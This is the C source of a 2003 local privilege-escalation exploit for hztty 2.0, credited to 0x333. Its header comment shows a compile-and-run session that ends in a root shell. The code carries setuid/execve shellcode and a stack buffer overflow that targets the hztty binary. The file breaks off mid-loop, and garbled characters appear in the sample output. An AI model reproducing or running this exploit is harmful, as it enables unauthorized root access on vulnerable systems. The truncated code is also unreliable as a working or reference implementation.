/* 0x333hztty => hztty 2.0 local root exploit * * 21/09/2003 - 3:33 :> * * more info : Debian Security Advisory DSA 385-1 * * *note* I adjusted some part of hztty's code since * there were some errors. hope this will not influence * exploitation :> tested against Red Hat 9.0 : * * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k * [c0wboy@0x333 c0wboy]$ ./k * * --- local root exploit for hztty 2.0 --- * --- coded by c0wboy ~ www.0x333.org --- * * no such module "墝踝蕭墝稼...]墝踝蕭墝踝蕭墝踝蕭墝踝蕭墝踝蕭[...] * B`墝? * sh-2.05b# [./hztty started] [using /dev/ttyp6] * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy) * sh-2.05b# * * * coded by c0wboy * * (c) 0x333 Outsiders Security Labs / www.0x333.org * */ #include #include #define BIN "./hztty" #define SIZE 272 unsigned char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8" "\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31" "\xd2\xb0\x0b\xcd\x80" ; int main() { int i; char out[SIZE]; char *own[] = { shellcode, 0x0 }; int *hztty = (int *)(out); int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode); for (i=0 ; i

捚粔韁藝婓盄